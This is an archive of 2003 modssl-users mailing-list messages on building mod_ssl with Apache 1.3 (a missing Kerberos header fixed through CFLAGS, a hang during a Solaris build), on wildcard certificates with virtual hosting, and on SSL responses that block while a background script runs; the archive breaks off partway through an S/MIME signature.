To: Dave Paris 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl compile problems
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Trevor Morrison 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Dave,

I already had the devel RPM installed but I went ahead and forced the 
reinstallation of both the openssl- and openssl-devel- packages.  I am 
still getting the same error.  Any other suggestions.

TIA

Trevor


Dave Paris wrote:

>you need the *-devel RPM as well.
>-dsp
>
>-----Original Message-----
>From: Trevor Morrison [mailto:trevor@hailix.com]
>Sent: Wednesday, August 20, 2003 10:16 PM
>To: modssl-users@modssl.org
>Subject: mod_ssl compile problems
>
>
>Hi,
>
>I am trying to compile in mod_ssl 2.8.15 into the apache1.3.28 source
>and using openssl-1.9.7a-2 installed from an RH RPM and I am getting the
>following error:
>
>ranlib libstandard.a
><=== src/modules/standard
>===> src/modules/ssl
>gcc -c -I../.. -I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE
>-I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208115 -DMOD_PERL
>-DUSE_PERL_SSI -D_REENTRANT  -DTHREADS_HAVE_PIDS -DDEBUGGING
>-fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE
>-D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -DUSE_HSREGEX
>-DEAPI -DEAPI_MM -DNO_DL_NEEDED `../../apaci` -DSSL_USE_SDBM
>-DSSL_ENGINE -DMOD_SSL_VERSION=\"2.8.15\" mod_ssl.c
>In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
>/usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
>In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
>/usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
>/usr/include/openssl/kssl.h:134: parse error before "FAR"
>/usr/include/openssl/kssl.h:135: parse error before '}' token
>/usr/include/openssl/kssl.h:147: parse error before "kssl_ctx_setstring"
>/usr/include/openssl/kssl.h:147: parse error before '*' token
>/usr/include/openssl/kssl.h:148: parse error before '*' token
>/usr/include/openssl/kssl.h:149: parse error before '*' token
>/usr/include/openssl/kssl.h:149: parse error before '*' token
>/usr/include/openssl/kssl.h:150: parse error before '*' token
>/usr/include/openssl/kssl.h:151: parse error before "kssl_ctx_setprinc"
>/usr/include/openssl/kssl.h:151: parse error before '*' token
>/usr/include/openssl/kssl.h:153: parse error before "kssl_cget_tkt"
>/usr/include/openssl/kssl.h:153: parse error before '*' token
>/usr/include/openssl/kssl.h:155: parse error before "kssl_sget_tkt"
>/usr/include/openssl/kssl.h:155: parse error before '*' token
>/usr/include/openssl/kssl.h:157: parse error before "kssl_ctx_setkey"
>/usr/include/openssl/kssl.h:157: parse error before '*' token
>/usr/include/openssl/kssl.h:159: parse error before "context"
>/usr/include/openssl/kssl.h:160: parse error before "kssl_build_principal_2"
>/usr/include/openssl/kssl.h:160: parse error before "context"
>/usr/include/openssl/kssl.h:163: parse error before "kssl_validate_times"
>/usr/include/openssl/kssl.h:163: parse error before "atime"
>/usr/include/openssl/kssl.h:165: parse error before "kssl_check_authent"
>/usr/include/openssl/kssl.h:165: parse error before '*' token
>/usr/include/openssl/kssl.h:167: parse error before "enctype"
>In file included from mod_ssl.h:116,
>                 from mod_ssl.c:65:
>/usr/include/openssl/ssl.h:909: parse error before "KSSL_CTX"
>/usr/include/openssl/ssl.h:931: parse error before '}' token
>make[4]: *** [mod_ssl.o] Error 1
>make[3]: *** [all] Error 1
>make[2]: *** [subdirs] Error 1
>make[2]: Leaving directory `/var/tmp/apache_1.3.28/src'
>make[1]: *** [build-std] Error 2
>make[1]: Leaving directory `/var/tmp/apache_1.3.28'
>make: *** [build] Error 2
>
>I am on a RH 9 box with a 2.4.20 compiled static kernle.
>
>TIA
>
>Trevor
>
>
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 26 22:28:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4C80EA8938; Tue, 26 Aug 2003 22:28:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lacrosse.corp.redhat.com (pix-525-pool.redhat.com [66.187.233.200])
	by master.modssl.org (Postfix) with ESMTP id 6C0C6A8933
	for ; Tue, 26 Aug 2003 22:27:27 +0200 (CEST)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by lacrosse.corp.redhat.com (8.11.6/8.9.3) with ESMTP id h7QKRNK00497;
	Tue, 26 Aug 2003 16:27:23 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.8/8.12.7) with ESMTP id h7QKRMtx005264;
	Tue, 26 Aug 2003 21:27:22 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.8/8.12.8/Submit) id h7QKRLbE005263;
	Tue, 26 Aug 2003 21:27:21 +0100
Date: Tue, 26 Aug 2003 21:27:21 +0100
From: Joe Orton 
To: Trevor Morrison 
Cc: modssl-users@modssl.org
Subject: Re: [Fwd: mod_ssl compile problems]
Message-ID: <20030826202721.GA5185@redhat.com>
Mail-Followup-To: Trevor Morrison ,
	modssl-users@modssl.org
References: <3F4BB9C3.2000109@hailix.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F4BB9C3.2000109@hailix.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> I am trying to compile in mod_ssl 2.8.15 into the apache1.3.28 source 
> and using openssl-1.9.7a-2 installed from an RH RPM and I am getting the 
> following error:
> 
> ranlib libstandard.a
> <=== src/modules/standard
> ===> src/modules/ssl
> gcc -c -I../.. -I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE 
> -I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208115 -DMOD_PERL 
> -DUSE_PERL_SSI -D_REENTRANT  -DTHREADS_HAVE_PIDS -DDEBUGGING 
> -fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE 
> -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -DUSE_HSREGEX
> -DEAPI -DEAPI_MM -DNO_DL_NEEDED `../../apaci` -DSSL_USE_SDBM 
> -DSSL_ENGINE -DMOD_SSL_VERSION=\"2.8.15\" mod_ssl.c
> In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
> /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
> In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
> /usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
...

You need to add "-I/usr/kerberos/include" to CFLAGS, use e.g.

CFLAGS="-I/usr/kerberos/include"
./configure --etc etc

when building Apache.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 26 22:35:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D38ACA8966; Tue, 26 Aug 2003 22:35:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by master.modssl.org (Postfix) with ESMTP id 8B202A8934
	for ; Tue, 26 Aug 2003 22:34:34 +0200 (CEST)
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by hailix.com (8.12.9/8.12.9) with ESMTP id h7QKYVpP026258;
	Tue, 26 Aug 2003 14:34:32 -0600
Message-ID: <3F4BC457.8080709@hailix.com>
Date: Tue, 26 Aug 2003 14:34:31 -0600
From: Trevor Morrison 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Joe Orton 
Cc: modssl-users@modssl.org
Subject: Re: [Fwd: mod_ssl compile problems]
References: <3F4BB9C3.2000109@hailix.com> <20030826202721.GA5185@redhat.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Trevor Morrison 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Joe, worked like a charm!

Trevor

P.S. was that line somewhere in Apaches configuraton notes?  If so, I 
overlooked it.  Thanks again.

Trevor


Joe Orton wrote:

>>I am trying to compile in mod_ssl 2.8.15 into the apache1.3.28 source 
>>and using openssl-1.9.7a-2 installed from an RH RPM and I am getting the 
>>following error:
>>
>>ranlib libstandard.a
>><=== src/modules/standard
>>===> src/modules/ssl
>>gcc -c -I../.. -I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE 
>>-I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208115 -DMOD_PERL 
>>-DUSE_PERL_SSI -D_REENTRANT  -DTHREADS_HAVE_PIDS -DDEBUGGING 
>>-fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE 
>>-D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -DUSE_HSREGEX
>>-DEAPI -DEAPI_MM -DNO_DL_NEEDED `../../apaci` -DSSL_USE_SDBM 
>>-DSSL_ENGINE -DMOD_SSL_VERSION=\"2.8.15\" mod_ssl.c
>>In file included from /usr/include/openssl/ssl.h:179,
>>                from mod_ssl.h:116,
>>                from mod_ssl.c:65:
>>/usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
>>In file included from /usr/include/openssl/ssl.h:179,
>>                from mod_ssl.h:116,
>>                from mod_ssl.c:65:
>>/usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
>>    
>>
>...
>
>You need to add "-I/usr/kerberos/include" to CFLAGS, use e.g.
>
>CFLAGS="-I/usr/kerberos/include"
>./configure --etc etc
>
>when building Apache.
>
>Regards,
>
>joe
>
>  
>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 26 22:37:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DCABA8968; Tue, 26 Aug 2003 22:37:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id 86CA4A8938
	for ; Tue, 26 Aug 2003 22:35:51 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id CC278FF63;
	Tue, 26 Aug 2003 16:35:47 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP
	id B90CD45368; Tue, 26 Aug 2003 16:35:46 -0400 (EDT)
From: "Dave Paris" 
To: , "Trevor Morrison" 
Subject: RE: [Fwd: mod_ssl compile problems]
Date: Tue, 26 Aug 2003 16:35:45 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
In-Reply-To: <20030826202721.GA5185@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

of course, this is assuming the kerberos libs have been installed. :-)
-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Joe Orton
Sent: Tuesday, August 26, 2003 4:27 PM
To: Trevor Morrison
Cc: modssl-users@modssl.org
Subject: Re: [Fwd: mod_ssl compile problems]


> I am trying to compile in mod_ssl 2.8.15 into the apache1.3.28 source 
> and using openssl-1.9.7a-2 installed from an RH RPM and I am getting the 
> following error:
> 
> ranlib libstandard.a
> <=== src/modules/standard
> ===> src/modules/ssl
> gcc -c -I../.. -I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE 
> -I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208115 -DMOD_PERL 
> -DUSE_PERL_SSI -D_REENTRANT  -DTHREADS_HAVE_PIDS -DDEBUGGING 
> -fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE 
> -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -DUSE_HSREGEX
> -DEAPI -DEAPI_MM -DNO_DL_NEEDED `../../apaci` -DSSL_USE_SDBM 
> -DSSL_ENGINE -DMOD_SSL_VERSION=\"2.8.15\" mod_ssl.c
> In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
> /usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
> In file included from /usr/include/openssl/ssl.h:179,
>                 from mod_ssl.h:116,
>                 from mod_ssl.c:65:
> /usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
...

You need to add "-I/usr/kerberos/include" to CFLAGS, use e.g.

CFLAGS="-I/usr/kerberos/include"
./configure --etc etc

when building Apache.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 26 23:25:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 18127A8938; Tue, 26 Aug 2003 23:25:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rohan.sdsu.edu (rohan.sdsu.edu [130.191.3.100])
	by master.modssl.org (Postfix) with ESMTP id 137EEA8933
	for ; Tue, 26 Aug 2003 23:24:28 +0200 (CEST)
Received: from rohan.sdsu.edu (rosebud@localhost [127.0.0.1])
	by rohan.sdsu.edu (8.12.9/8.12.8) with ESMTP id h7QLMGvM001583
	for ; Tue, 26 Aug 2003 14:22:16 -0700 (PDT)
Received: from localhost (rosebud@localhost)
	by rohan.sdsu.edu (8.12.9/8.12.8/Submit) with SMTP id h7QLMDjb001580
	for ; Tue, 26 Aug 2003 14:22:13 -0700 (PDT)
Date: Tue, 26 Aug 2003 14:22:13 -0700 (PDT)
From: Citizen Kane 
To: modssl-users@modssl.org
Subject: make problem
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Citizen Kane 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am attempting to get 
apache_1.3.28
openssl-0.9.7b
mod_ssl/2.8.15
rsaref
working on solaris 9.  When configuring apache with this command:
./configure --with-apache=/usr/share/src/apache_1.3.28/ --with-rsa=/lib
with-ssl=/usr/share/src/openssl-0.9.7b --prefix=/usr/local/apache
everything seems okay.  When I run make the process gets stuck here:

se-br# nohup make
===> src
===> src/os/unix
<=== src/os/unix
===> src/ap
<=== src/ap
===> src/main
<=== src/main
===> src/lib
===> src/lib/expat-lite
<=== src/lib/expat-lite
<=== src/lib
===> src/modules
===> src/modules/experimental
<=== src/modules/experimental
===> src/modules/standard
<=== src/modules/standard
===> src/modules/extra
<=== src/modules/extra
===> src/modules/proxy
<=== src/modules/proxy
===> src/modules/example
<=== src/modules/example
===> src/modules/ssl
flex -Pssl_expr_yy -s -B ssl_expr_scan.l


Any ideas what has gone wrong?

Here is my ps output:

# ps -ef
     UID   PID  PPID  C    STIME TTY      TIME CMD

    root   339   338  0 22:11:25 pts/2    0:00 make
    root   349   339  0 22:11:25 pts/2    0:00 sh -ce make -f ./Makefile
root= build-std
    root   350   349  0 22:11:25 pts/2    0:00 make -f ./Makefile root=
build-std
    root   359   350  0 22:11:26 pts/2    0:00 sh -ce case
"xsun4u-sun-solaris2.290" in \  x*390*) _C89_STEPS="0xffffffff"; e
    root   360   359  0 22:11:26 pts/2    0:00 make SDP=src/ all
    root   369   360  0 22:11:26 pts/2    0:00 sh -ce for i in os/unix ap
main lib modules; do \echo "===> src/$i"; \case 
    root   416   369  0 22:11:27 pts/2    0:00 make SDP=src/ CC=gcc
AUX_CFLAGS= -DSOLARIS2=290 -DMOD_SSL=208115 -DEAPI -DUSE_E
    root   425   416  0 22:11:27 pts/2    0:00 sh -ce for i in
experimental standard extra proxy example ssl ""; do \  if [ "
    root   471   425  0 22:11:28 pts/2    0:00 make SDP=src/ CC=gcc
AUX_CFLAGS= -DSOLARIS2=290 -DMOD_SSL=208115 -DEAPI -DUSE_E
    root   480   471 95 22:11:28 pts/2   62:31 make SDP=src/ CC=gcc
AUX_CFLAGS= -DSOLARIS2=290 -DMOD_SSL=208115 -DEAPI -DUSE_E





Soo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 16:56:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9FD6CA8947; Mon,  1 Sep 2003 16:56:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 1F206A8940
	for ; Mon,  1 Sep 2003 16:56:49 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h81EuAj06400
	for ; Mon, 1 Sep 2003 15:56:34 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Mon, 1 Sep 2003 15:56:05 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2E7B@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: virtual hosting
Date: Mon, 1 Sep 2003 15:56:06 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Boocock, John (Academy) [mailto:John.Boocock@capita.co.uk]
> Sent: 22 August 2003 14:04
> To: 'modssl-users@modssl.org'
> Subject: RE: virtual hosting
> 
> 
> Although I'm sure that most people get quite bored and 
> frustrated about
> questions on virtual hosting that have appeared countless times in the
> archives I don't think I've ever noticed what I was wondering being
> answered.
> 
> If you had a wildcard certificate which worked for 
> *.domain.com, would name
> virtual hosting be possible then assuming that all your 
> virtual hosts were
> things like "secure.domain.com" and "basket.domain.com" as 
> they are actually
> all using the same wildcard certificate for the SSL handshake.
> 
> If anyone could answer that, it would be great and 
> potentially save some
> messing when it comes to IP addresses.
> 
> Cheers
> 
> JB
> 
I'd have thought you'd have found an answer from me in the archives (or
perhaps in the openssl archives).

Yes, you can use wildcard certificates. It is possible to use them on the
same IP address and port and it works (this is from memory of what those who
use this method have written).

However:

1. CAs have got wise to wildcard certificates and charge a couple of limbs
for the privilege of using them.
2. There's no guarantee that IE will support it and Microsoft may well break
support for it again.

If you are doing this on a "private" network, probably neither of the above
will affect you.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The trouble with postmodernism isn't just that no-one actually believes in
it, but no-one can believe in it.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  1 17:33:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AE3D3A8962; Mon,  1 Sep 2003 17:33:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from listes.cru.fr (listes.cru.fr [195.220.94.165])
	by master.modssl.org (Postfix) with ESMTP id DAEB0A8944
	for ; Mon,  1 Sep 2003 17:33:17 +0200 (CEST)
Received: from cru.fr (vk.cru.fr [195.220.94.94])
	by listes.cru.fr (8.12.9/8.12.9/8.12-CW) with ESMTP id h81FXHbM024100
	for ; Mon, 1 Sep 2003 17:33:17 +0200
Message-ID: <3F53667B.2090803@cru.fr>
Date: Mon, 01 Sep 2003 17:32:11 +0200
From: Vincent KERAVEC 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Modssl wait background script to finish
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms000004070001050408090401"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vincent KERAVEC 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms000004070001050408090401
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello,
I've got a problem with modssl. When I run a script in background, the
server doesn't respond to the browser who start the script on port 143
until the script finish. The server continue to reply to all other browser.

I'm running Apache/2.0.40 (Red Hat Linux) with mod_ssl/2.0.40 and
OpenSSL/0.9.7a. I'm also using client side authentication.

Is there something to change in the ssl configuration to allow
background process ?

Thanks,
Vincent KERAVEC

ps : When i put modssl in loglevel debug the server seems to wait after
this message :
    [Wed Aug 27 15:10:30 2003] [debug]
/usr/src/build/250859-i386/BUILD/httpd-2.0.40/modules/ssl/ssl_engine_io.c(1005):


+-------------------------------------------------------------------------+
[Wed Aug 27 15:10:30 2003] [info] Initial (No.1) HTTPS request received
for child 0 (server ***.****.***:443)


--------------ms000004070001050408090401
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIMjzCC
A9swggLDoAMCAQICAQIwDQYJKoZIhvcNAQEEBQAwTzELMAkGA1UEBhMCRlIxDDAKBgNVBAoT
A0NSVTESMBAGA1UEAxMJYWMtcmFjaW5lMR4wHAYJKoZIhvcNAQkBFg9jYS1hZG1pbkBjcnUu
ZnIwHhcNMDMwNTE2MDkzMTE3WhcNMTIxMjE0MDkzMTE3WjBUMQswCQYDVQQGEwJGUjEMMAoG
A1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwGCSqGSIb3DQEJARYPY2Et
YWRtaW5AY3J1LmZyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtXGYMirQ2feu
6b4FDrH8PRwIyjfXPSXaG33GoatYJIbOmxAwnGbwVBng3WDzoW5X45RWq93nOxSdx4MTsGQJ
pBihob2h4XeGpL54WlLd+kvOxvp/0OzLYYcESI3dpVRjf6jB8Ggc7BUlE+ptIjyXAVTNKz1o
6aiLSR6G1zG5cidq3BAXjlpfvbX9EWfICcnmLMSQ29oam857EsAJRuGHNajdPEMUlsioEIf2
Zf4YL9pa5rJ5Efs7NTxu8ffICGYlCynJXJTC461sRrub8s6SOM69NTw8EM+1A3ewd5WyGkZe
QSG7SJyJY8Lg8u4CMoflOjP3LSYhCLI1Ic0gX08dkQIDAQABo4G8MIG5MA8GA1UdEwEB/wQF
MAMBAf8wHQYDVR0OBBYEFBUKfCi1rKa81/0yMx15vbNJCjGQMHcGA1UdIwRwMG6AFK8vz0qV
BLbeJLMJqVU+XA4c+HEuoVOkUTBPMQswCQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRIwEAYD
VQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2NhLWFkbWluQGNydS5mcoIBADAOBgNV
HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEEBQADggEBAMG/+LofN2vISFWieXrHsFsIrM/2WUhf
zAcE2/Ga+/UWvJaDJO9RlbUNN3l+f40L1yUJW9kZqY4XMBcbJ6jbpmeJ+zTf+zveAD/sl9ZN
qoC931HFLq/TGjZSIQxX4Nxad9DFbok66X1qfRZF4+beaz2zjrF07LvjWX6201Rc6zQhNyTy
UdO/wYY0EBYu0CFrTK4RxS6d2LsyO1p1Xj7oMCa9Utmu/igZoXJYL709POBKHJoYNU+LI6iJ
8aYcZupJ/GXVxfj68L1KP2i8cM3a570bJCDbsKcchzZqsvII5cewU7KKPH4fyMyfsA39tJ0V
BMQyvdWZHpS75DN0eB5UVzUwggRUMIIDPKADAgECAgIArzANBgkqhkiG9w0BAQQFADBUMQsw
CQYDVQQGEwJGUjEMMAoGA1UEChMDQ1JVMRcwFQYDVQQDEw5hYy11dGlsaXNhdGV1cjEeMBwG
CSqGSIb3DQEJARYPY2EtYWRtaW5AY3J1LmZyMB4XDTAzMDgwNDA5MDY1MVoXDTA0MDIwNDA5
MDY1MVowdjELMAkGA1UEBhMCRlIxJjAkBgNVBAoTHUNvbWl0ZSBSZXNlYXUgZGVzIFVuaXZl
cnNpdGVzMRgwFgYDVQQDEw9WaW5jZW50IEtlcmF2ZWMxJTAjBgkqhkiG9w0BCQEWFnZpbmNl
bnQua2VyYXZlY0BjcnUuZnIwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJzgzJhRsdK7
COdmWp/pUedGyXgStXGuQqVP9d0biQ4EBngiDhSt2rNYNKjaYg362nAy3tGxXIxLVaAziSnz
ES35pAIaM4X+FJ5F6bcABhtdeE3MSGKWnTPEk9pe6iOH2lYiwHzWx3UxlCK6nX5LIh182kKm
I5JoxlqJ4jb933H7AgMBAAGjggGQMIIBjDAMBgNVHRMBAf8EAjAAMBEGCWCGSAGG+EIBAQQE
AwIEsDAOBgNVHQ8BAf8EBAMCBeAwcAYJYIZIAYb4QgENBGMWYUNlcnRpZmljYXQgYWMtdXRp
bGlzYXRldXIuIFBvdXIgdG91dGUgaW5mb3JtYXRpb24gc2UgcmVwb3J0ZXIg4CBodHRwOi8v
aWdjLmNydS5mci9hYy11dGlsaXNhdGV1ci8wHQYDVR0OBBYEFFs58KNky28A7glEun75Mmhk
wCN0MHcGA1UdIwRwMG6AFBUKfCi1rKa81/0yMx15vbNJCjGQoVOkUTBPMQswCQYDVQQGEwJG
UjEMMAoGA1UEChMDQ1JVMRIwEAYDVQQDEwlhYy1yYWNpbmUxHjAcBgkqhkiG9w0BCQEWD2Nh
LWFkbWluQGNydS5mcoIBAjBPBgNVHR8ESDBGMESgQqBAhj5odHRwOi8vaWdjLmNydS5mci9j
Z2ktYmluL2xvYWRjcmw/Q0E9YWMtdXRpbGlzYXRldXImZm9ybWF0PURFUjANBgkqhkiG9w0B
AQQFAAOCAQEAgMl91vNCS/NYGWcceN3Y5HcCPZ8qzR+PWwulEmLpbdAyZDf1iYP8GmQfD/SN
